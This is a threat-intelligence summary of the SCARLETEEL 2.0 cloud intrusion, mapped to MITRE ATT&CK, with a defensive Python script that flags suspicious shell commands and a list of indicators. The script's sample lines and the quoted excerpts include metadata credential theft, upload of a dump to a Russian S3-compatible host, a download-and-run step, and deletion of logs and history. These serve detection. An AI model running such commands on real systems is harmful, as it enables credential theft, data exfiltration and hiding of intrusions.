Scarleteel 2.0 is analyzed through the MITRE ATT&CK framework to map how adversaries move from an exposed Kubernetes/JupyterLab deployment to credential theft, execution, privilege escalation, lateral movement in AWS, and data exfiltration. The investigation also highlights defense evasion like log and history deletion and culminates in Russian S3-compatible exfil endpoints and cloud cryptomining activity.
Keypoints
- SCARLETEEL 2.0 is examined using the MITRE ATT&CK framework to understand attacker tactics, techniques, and procedures across the attack lifecycle.
- Initial access occurred via a publicly exposed, compromised containerized workload in a Kubernetes cluster hosting JupyterLab notebooks.
- Attackers retrieved AWS credentials via the EC2 instance metadata service (169.254.169.254) to pivot into the victim’s cloud environment.
- Execution involved Pandora/Mirai-related components, followed by script-based downloads and shell execution within the compromised host.
- Privilege escalation exploited IAM policy weaknesses and admin-account naming conventions to gain greater access.
- Lateral movement leveraged Pacu and AWS CLI to enumerate and exploit cloud permissions, culminating in new AWS resources and mining activity.
- Command and control and exfiltration relied on Russian endpoints, including base64-encoded data sent to remote hosts and uploads to S3-compatible object storage.
- Defense evasion included log and shell-history deletion and running a Monero/XMRig miner in the background to obscure activity.
- The analysis underscores the need for end-to-end cloud and container security controls, continuous monitoring, and rapid response.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Initial access was achieved by exploiting a compromised containerized workload exposed to the public. Quote: “…the initial breach was achieved by exploiting a compromised containerized workload exposed to the public.”
- [T1059.004] Unix Shell – Execution through shell operations, including downloading and running scripts. Quote: “chmod +x Pandora.sh … bash -s …”
- [T1552.001] Credentials in Files – Adversaries search for credential files such as .git-credentials and accounts.xml in the filesystem. Quote: “CRED_FILE_NAMES array … searching for $CREFILE”
- [T1078] Valid Accounts – Privilege escalation involved admin accounts and IAM policy manipulation. Quote: “The exploit was achieved due to a specific naming convention used for all admin accounts… ‘adminJoe’, ‘adminBob’ …”
- [T1567.002] Exfiltration to Cloud Storage – Data was exfiltrated to a Russian S3-compatible endpoint via cloud storage. Quote: “By using the ‘--endpoint-url’ option, they did not send the API requests to the default AWS services endpoints, but instead to hb.bizmrg.com, which redirects to mcs.mail.ru/storage, a Russian S3-compatible object storage.”
- [T1070] Indicator Removal on Host – Defense evasion through removal of logs and command history. Quote: “rm -f /var/log/syslog.* … rm -f ~/.bash_history”
- [T1496] Resource Hijacking – Monero cryptominer executed in the background to expand attack capabilities. Quote: “the Monero cryptominer was executed in the background using the names for containerD and the systemD service as a defense evasion technique.”
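As an added defender-side example (not code from the report or from the SCARLETEEL actors), the following Python triage rules flag captured shell command lines that match the techniques listed above: metadata-service credential access, aws-cli calls whose `--endpoint-url` points outside AWS, log and shell-history deletion, credential-file searches, and download-and-execute patterns. The sample command lines are constructed after the report's quotes, and the indicator values come from the IoC list on this page.

```python
import re
from urllib.parse import urlparse

# Indicator values taken from the report's IoC list
IMDS_HOSTS = ("169.254.169.254", "100.64.0.1")
CRED_FILES = (".git-credentials", "accounts.xml")
# Hosts the aws CLI should be talking to; anything else behind --endpoint-url is suspect
AWS_SUFFIXES = (".amazonaws.com", ".amazonaws.com.cn")

ENDPOINT_RE = re.compile(r"--endpoint-url[= ]+(\S+)")
RM_RE = re.compile(r"\brm\b.*?(/var/log/\S*|\.bash_history)")
DOWNLOAD_EXEC_RE = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b|\bbash\s+-s\b")


def classify(cmdline: str) -> list[str]:
    """Return the labels of the report's techniques matched by one captured command line."""
    hits = []
    if any(h in cmdline for h in IMDS_HOSTS):
        hits.append("imds-credential-access")  # metadata service queried from the workload
    m = ENDPOINT_RE.search(cmdline)
    if m and re.search(r"\baws\s", cmdline):
        host = urlparse(m.group(1)).hostname or ""
        if not host.endswith(AWS_SUFFIXES):
            hits.append("T1567.002 non-AWS S3 endpoint: " + host)
    if RM_RE.search(cmdline):
        hits.append("T1070 log/history deletion")
    if any(f in cmdline for f in CRED_FILES):
        hits.append("T1552.001 credential file access")
    if DOWNLOAD_EXEC_RE.search(cmdline):
        hits.append("T1059.004 download-and-execute")
    return hits


def scan(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to its technique labels; clean lines are omitted."""
    return {c: h for c in cmdlines if (h := classify(c))}


# Constructed sample command lines, shaped after the quotes in the report (not real captures)
SAMPLE_CMDLINES = [
    "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "chmod +x Pandora.sh && bash -s < ./Pandora.sh",
    "aws s3 cp ./dump.tar.gz s3://bucket/ --endpoint-url https://hb.bizmrg.com",
    "aws s3 ls --endpoint-url https://s3.us-east-1.amazonaws.com",
    "rm -f /var/log/syslog.* ; rm -f ~/.bash_history",
    "find / -name .git-credentials -o -name accounts.xml 2>/dev/null",
    "ls -la /home",
]

if __name__ == "__main__":
    for cmd, labels in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(labels):45} <- {cmd}")
```

The aws-cli call to the legitimate `s3.us-east-1.amazonaws.com` endpoint is deliberately included to show that only non-AWS `--endpoint-url` targets are flagged.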
Indicators of Compromise
- [IP Address] – AWS instance metadata service and internal cloud endpoints – 169.254.169.254, 100.64.0.1
- [IP Address] – Exfiltration and C2-related targets – 45.9.148.221, 175.102.182.6, 5.39.93.71
- [Domain] – External endpoints used for exfiltration or redirection – hb.bizmrg.com, mcs.mail.ru/storage, temp.sh
- [File] – Credentials-related filenames scanned/targeted – .git-credentials, accounts.xml
- [URL] – Exfiltration and data upload endpoints – https://45.9.148.221/in/in.php?base64=…, http://temp.sh/